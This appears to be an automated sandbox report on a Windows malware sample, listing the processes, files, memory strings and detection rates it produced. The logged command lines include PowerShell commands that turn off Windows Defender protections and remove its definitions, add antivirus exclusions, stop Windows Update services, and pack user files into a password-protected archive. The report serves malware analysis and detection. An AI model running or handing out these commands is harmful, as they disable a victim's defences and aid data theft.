Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75642

Jump to behavior

Source: C:\ProgramData\main.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Command line argument: sfxname	5_2_0038037C
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Command line argument: sfxstime	5_2_0038037C
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Command line argument: pP:	5_2_0038037C
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Command line argument: STARTDLG	5_2_0038037C
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Command line argument: >G9	5_2_00394690

Source: TS-240605-Millenium1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: based.exe, 00000008.00000002.2124717831.000001EB875E4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2118920183.000001EB875DD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120409481.000001EB875E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: TS-240605-Millenium1.exe	ReversingLabs: Detection: 27%
Source: TS-240605-Millenium1.exe	Virustotal: Detection: 36%

Source: TS-240605-Millenium1.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: TS-240605-Millenium1.exe	String found in binary or memory: --help
Source: TS-240605-Millenium1.exe	String found in binary or memory: --help
Source: TS-240605-Millenium1.exe	String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
Source: TS-240605-Millenium1.exe	String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
Source: based.exe	String found in binary or memory: set-addPolicy
Source: based.exe	String found in binary or memory: id-cmc-addExtensions
Source: based.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: based.exe	String found in binary or memory: --help
Source: based.exe	String found in binary or memory: --help
Source: based.exe	String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
Source: based.exe	String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

File read: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TS-240605-Millenium1.exe "C:\Users\user\Desktop\TS-240605-Millenium1.exe"
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Process created: C:\Users\user\Desktop\TS-240605-Millenium1.exe "C:\Users\user\Desktop\TS-240605-Millenium1.exe"
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\svchost.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\ProgramData\main.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\timeout.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Process created: C:\Users\user\Desktop\TS-240605-Millenium1.exe "C:\Users\user\Desktop\TS-240605-Millenium1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\ProgramData\main.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat
Source: C:\ProgramData\svchost.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

